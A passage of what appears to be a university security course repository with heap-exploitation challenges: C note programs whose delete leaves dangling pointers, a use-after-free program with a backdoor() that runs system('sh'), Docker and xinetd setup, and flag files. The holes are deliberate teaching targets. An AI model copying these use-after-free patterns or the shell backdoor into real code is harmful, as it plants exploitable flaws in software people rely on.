"Full!" ); 73 | } 74 | 75 | 76 | void list(){ 77 | for( int i = 0 ; i < MAX ; ++i ){ 78 | if( notes[i].data && !notes[i].is_freed ){ 79 | printf( "Note %d:\n Data: %s\n Desc: %s\n" , i , notes[i].data , notes[i].description ); 80 | } 81 | } 82 | puts(""); 83 | } 84 | 85 | 86 | void delete(){ 87 | printf( "Which note do you want to delete?\nIndex: " ); 88 | uint64_t idx = read_int(); 89 | 90 | if( idx >= MAX ){ 91 | puts( "Invalid index." ); 92 | return; 93 | } 94 | 95 | if( !notes[idx].data ){ 96 | puts( "No such note!" ); 97 | return; 98 | } 99 | 100 | if( notes[idx].is_freed ){ 101 | puts( "Double free! Bad hacker :(" ); 102 | _exit(-1); 103 | } 104 | 105 | free( notes[idx].data ); 106 | notes[idx].is_freed = 1; 107 | } 108 | 109 | 110 | void menu(){ 111 | puts( "1. Add a note" ); 112 | puts( "2. List notes" ); 113 | puts( "3. Delete a note" ); 114 | puts( "4. Exit" ); 115 | puts( "> " ); 116 | } 117 | 118 | 119 | int main(){ 120 | 121 | init(); 122 | 123 | while(1){ 124 | menu(); 125 | 126 | int n = read_int(); 127 | 128 | switch( n ){ 129 | case 1: 130 | add(); 131 | break; 132 | case 2: 133 | list(); 134 | break; 135 | case 3: 136 | delete(); 137 | break; 138 | default: 139 | puts( "Invalid choice." ); 140 | break; 141 | } 142 | } 143 | 144 | return 0; 145 | } -------------------------------------------------------------------------------- /week3/src/note.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #define MAX 10 6 | 7 | 8 | void init(){ 9 | setvbuf(stdout,0,2,0); 10 | setvbuf(stdin,0,2,0); 11 | setvbuf(stderr,0,2,0); 12 | } 13 | 14 | 15 | uint64_t read_long(){ 16 | char buf[0x10]; 17 | __read_chk( 0 , buf , 0xf , 0x10 ); 18 | return atol( buf ); 19 | } 20 | 21 | 22 | char* notes[MAX]; 23 | 24 | void add(){ 25 | for( int i = 0 ; i < MAX ; ++i ){ 26 | if( !notes[i] ){ 27 | printf( "Size: " ); 28 | uint64_t size = read_long(); 29 | 30 | notes[i] = malloc( size ); 31 | 32 | printf( "Note: " ); 33 | read( 0 , notes[i] , size - 1 ); 34 | 35 | puts( "Done!" ); 36 | return; 37 | } 38 | } 39 | puts( "Full!" ); 40 | } 41 | 42 | 43 | void show(){ 44 | printf( "Which note do you want to show?\nIndex: " ); 45 | uint64_t idx = read_long(); 46 | 47 | if( idx >= MAX ){ 48 | puts( "Invalid index." ); 49 | return; 50 | } 51 | 52 | if( notes[idx] ){ 53 | printf( "Note %d:\n%s\n" , idx , notes[idx] ); 54 | } 55 | else{ 56 | puts( "No such note!" ); 57 | } 58 | } 59 | 60 | 61 | void delete(){ 62 | printf( "Which note do you want to delete?\nIndex: " ); 63 | uint64_t idx = read_long(); 64 | 65 | if( idx >= MAX ){ 66 | puts( "Invalid index." ); 67 | return; 68 | } 69 | 70 | if( notes[idx] ){ 71 | free( notes[idx] ); // dangling pointer, vulnerable! 72 | // notes[idx] = NULL; // The proper way 73 | } 74 | else{ 75 | puts( "No such note!" ); 76 | } 77 | } 78 | 79 | 80 | void menu(){ 81 | puts( "1. Add a note" ); 82 | puts( "2. Show a note" ); 83 | puts( "3. Delete a note" ); 84 | puts( "4. Exit" ); 85 | puts( "> " ); 86 | } 87 | 88 | 89 | int main(){ 90 | 91 | init(); 92 | 93 | while(1){ 94 | menu(); 95 | 96 | uint64_t n = read_long(); 97 | 98 | switch( n ){ 99 | case 1: 100 | add(); 101 | break; 102 | case 2: 103 | show(); 104 | break; 105 | case 3: 106 | delete(); 107 | break; 108 | default: 109 | puts( "Invalid choice." ); 110 | break; 111 | } 112 | } 113 | 114 | return 0; 115 | } -------------------------------------------------------------------------------- /week3/src/t-note.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #define MAX 10 6 | 7 | 8 | void init(){ 9 | setvbuf(stdout,0,2,0); 10 | setvbuf(stdin,0,2,0); 11 | setvbuf(stderr,0,2,0); 12 | } 13 | 14 | 15 | uint64_t read_long(){ 16 | char buf[0x10]; 17 | __read_chk( 0 , buf , 0xf , 0x10 ); 18 | return atol( buf ); 19 | } 20 | 21 | 22 | char* notes[MAX]; 23 | 24 | void add(){ 25 | for( int i = 0 ; i < MAX ; ++i ){ 26 | if( !notes[i] ){ 27 | printf( "Size: " ); 28 | uint64_t size = read_long(); 29 | 30 | notes[i] = malloc( size ); 31 | 32 | printf( "Note: " ); 33 | read( 0 , notes[i] , size - 1 ); 34 | 35 | puts( "Done!" ); 36 | return; 37 | } 38 | } 39 | puts( "Full!" ); 40 | } 41 | 42 | 43 | void show(){ 44 | printf( "Which note do you want to show?\nIndex: " ); 45 | uint64_t idx = read_long(); 46 | 47 | if( idx >= MAX ){ 48 | puts( "Invalid index." ); 49 | return; 50 | } 51 | 52 | if( notes[idx] ){ 53 | printf( "Note %d:\n%s\n" , idx , notes[idx] ); 54 | } 55 | else{ 56 | puts( "No such note!" ); 57 | } 58 | } 59 | 60 | 61 | void delete(){ 62 | printf( "Which note do you want to delete?\nIndex: " ); 63 | uint64_t idx = read_long(); 64 | 65 | if( idx >= MAX ){ 66 | puts( "Invalid index." ); 67 | return; 68 | } 69 | 70 | if( notes[idx] ){ 71 | free( notes[idx] ); // dangling pointer, vulnerable! 72 | // notes[idx] = NULL; // The proper way 73 | } 74 | else{ 75 | puts( "No such note!" ); 76 | } 77 | } 78 | 79 | 80 | void menu(){ 81 | puts( "1. Add a note" ); 82 | puts( "2. Show a note" ); 83 | puts( "3. Delete a note" ); 84 | puts( "4. Exit" ); 85 | puts( "> " ); 86 | } 87 | 88 | 89 | int main(){ 90 | 91 | init(); 92 | 93 | while(1){ 94 | menu(); 95 | 96 | uint64_t n = read_long(); 97 | 98 | switch( n ){ 99 | case 1: 100 | add(); 101 | break; 102 | case 2: 103 | show(); 104 | break; 105 | case 3: 106 | delete(); 107 | break; 108 | default: 109 | puts( "Invalid choice." ); 110 | break; 111 | } 112 | } 113 | 114 | return 0; 115 | } -------------------------------------------------------------------------------- /week3/src/uaf.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | 7 | void init(){ 8 | setvbuf(stdout,0,2,0); 9 | setvbuf(stdin,0,2,0); 10 | setvbuf(stderr,0,2,0); 11 | } 12 | 13 | int read_int(){ 14 | char buf[0x10]; 15 | __read_chk( 0 , buf , 0xf , 0x10 ); 16 | return atoi( buf ); 17 | } 18 | 19 | void welcome_func(){ 20 | puts( "Hello ~~~" ); 21 | } 22 | 23 | void bye_func(){ 24 | puts( "Bye ~~~" ); 25 | } 26 | 27 | void menu(){ 28 | puts( "1. add a box" ); 29 | puts( "2. exit" ); 30 | puts( ">" ); 31 | } 32 | 33 | struct MessageBox{ 34 | void (*welcome)(); 35 | void (*bye)(); 36 | }; 37 | 38 | void backdoor(){ 39 | system("sh"); 40 | } 41 | 42 | int main(){ 43 | 44 | init(); 45 | 46 | struct MessageBox* msgbox = (struct MessageBox*) malloc( sizeof( struct MessageBox ) ); 47 | 48 | msgbox->welcome = welcome_func; 49 | msgbox->bye = bye_func; 50 | 51 | msgbox->welcome(); 52 | free( msgbox ); 53 | 54 | int n = 3, size; 55 | char *msg; 56 | 57 | while( n-- ){ 58 | printf( "Size of your message: " ); 59 | size = read_int(); 60 | 61 | msg = (char*) malloc( size ); 62 | 63 | printf( "Message: " ); 64 | read( 0 , msg , size ); 65 | 66 | printf( "Saved message: %s\n" , msg ); 67 | 68 | free( msg ); 69 | } 70 | 71 | msgbox->bye(); 72 | 73 | return 0; 74 | } -------------------------------------------------------------------------------- /week3/t-note/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | MAINTAINER yuawn 3 | RUN apt-get update 4 | RUN apt-get install xinetd -y 5 | RUN useradd -m t-note 6 | RUN chmod 774 /tmp 7 | RUN chmod -R 774 /var/tmp 8 | RUN chmod -R 774 /dev 9 | RUN chmod -R 774 /run 10 | RUN chmod 1733 /tmp /var/tmp /dev/shm 11 | RUN chown -R root:root /home/t-note 12 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /week3/t-note/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{Tcache_Perf0rm4nce_0r_Secur17y?} 2 | -------------------------------------------------------------------------------- /week3/t-note/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | exec 2>/dev/null 4 | timeout 60 /home/t-note/t-note 5 | -------------------------------------------------------------------------------- /week3/t-note/share/t-note: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week3/t-note/share/t-note -------------------------------------------------------------------------------- /week3/t-note/xinetd: -------------------------------------------------------------------------------- 1 | service t-note 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/t-note/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = t-note 10 | port = 4597 11 | flags = REUSE 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | } 16 | -------------------------------------------------------------------------------- /week3/uaf/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:16.04 2 | MAINTAINER yuawn 3 | RUN apt-get update 4 | RUN apt-get install xinetd -y 5 | RUN useradd -m uaf 6 | RUN chmod 774 /tmp 7 | RUN chmod -R 774 /var/tmp 8 | RUN chmod -R 774 /dev 9 | RUN chmod -R 774 /run 10 | RUN chmod 1733 /tmp /var/tmp /dev/shm 11 | RUN chown -R root:root /home/uaf 12 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /week3/uaf/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{U5e_af7er_freeeeeeee_yeeeeeeee} 2 | -------------------------------------------------------------------------------- /week3/uaf/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | exec 2>/dev/null 4 | timeout 60 /home/uaf/uaf 5 | -------------------------------------------------------------------------------- /week3/uaf/share/uaf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yuawn/NTU-Computer-Security/d6af31d7b71304ff6f44c8faa454815783923035/week3/uaf/share/uaf -------------------------------------------------------------------------------- /week3/uaf/xinetd: -------------------------------------------------------------------------------- 1 | service uaf 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/uaf/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = uaf 10 | port = 4597 11 | flags = REUSE 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | } 16 | --------------------------------------------------------------------------------